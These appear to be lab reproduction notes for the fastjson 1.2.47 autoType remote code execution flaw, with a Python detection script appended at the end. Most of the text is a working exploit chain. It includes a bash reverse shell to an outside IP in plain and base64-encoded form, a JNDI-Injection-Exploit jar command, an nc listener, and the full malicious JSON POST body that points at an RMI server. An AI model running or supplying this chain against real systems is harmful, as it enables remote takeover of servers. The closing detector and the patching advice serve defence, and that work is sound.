
fastjson reproduction notes (vulhub / attacker / POST)

vulhub:

Locate the fastjson 1.2.47 RCE environment

docker-compose up -d
nc -lvp 9443

attacker

Reverse shell

bash -i >& /dev/tcp/192.168.211.129/9443 0>&1

Encoding (base64)

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxMS4xMjkvOTQ0MyAwPiYx}|{base64,-d}|{bash,-i}

The last IP is that of the Apache (Tomcat) server, 172.26.39.196. Command to start it:

/usr/local/apache-tomcat-8.5.69/webapps/ROOT# ./startup.sh

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxMS4xMjkvOTQ0MyAwPiYx}|{base64,-d}|{bash,-i}" -A "172.26.39.196"

Start the listener

POST:

Content-Type: application/json

{
  "a": {
    "@type": "java.lang.Class",
    "val": "com.sun.rowset.JdbcRowSetImpl"
  },
  "b": {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "rmi://172.26.39.196:1099/mmwktn",
    "autoCommit": true
  }
}

Here dataSourceName is the JDK 1.8 RMI address generated by JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar.
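As an added example from the detection side (not part of the original post), a small Python check that flags a request body carrying the autoType pattern shown above: a java.lang.Class entry with a val, a JdbcRowSetImpl @type, and a dataSourceName that points at an RMI/LDAP URL. The class list and the sample body are constructed from this page and are assumptions, not a complete deny list.

```python
import json
import re
from typing import Any, List

# Constructed sample: the request body from the write-up above, straight-quoted.
SAMPLE_BODY = '''{
  "a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},
  "b": {"@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "rmi://172.26.39.196:1099/mmwktn",
        "autoCommit": true}
}'''

# Gadget classes named on this page (assumption: extend from your own deny list).
SUSPICIOUS_TYPES = {"java.lang.Class", "com.sun.rowset.JdbcRowSetImpl"}
# JNDI-capable URL schemes a dataSourceName should never point at.
JNDI_URL = re.compile(r"^(rmi|ldap|ldaps|iiop)://", re.IGNORECASE)


def scan(node: Any, path: str = "$") -> List[str]:
    """Walk a decoded JSON document and return findings for fastjson autoType abuse."""
    findings: List[str] = []
    if isinstance(node, dict):
        t = node.get("@type")
        if isinstance(t, str):
            if t in SUSPICIOUS_TYPES:
                findings.append(f"{path}: @type={t}")
            # 1.2.47 bypass: java.lang.Class with a 'val' pre-loads a class into the cache.
            if t == "java.lang.Class" and "val" in node:
                findings.append(f"{path}: java.lang.Class val={node['val']} (autoType cache bypass)")
        for key, value in node.items():
            if key == "dataSourceName" and isinstance(value, str) and JNDI_URL.match(value):
                findings.append(f"{path}.{key}: JNDI URL {value}")
            findings.extend(scan(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            findings.extend(scan(value, f"{path}[{i}]"))
    return findings


def findings_for(body: str) -> List[str]:
    """Decode a raw body; anything that is not JSON is out of scope for this check."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []
    return scan(doc)


def is_malicious(body: str) -> bool:
    return bool(findings_for(body))


if __name__ == "__main__":
    for line in findings_for(SAMPLE_BODY):
        print(line)
```

Treat this as a detection layer only; the fix is a patched fastjson version with autoType disabled.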
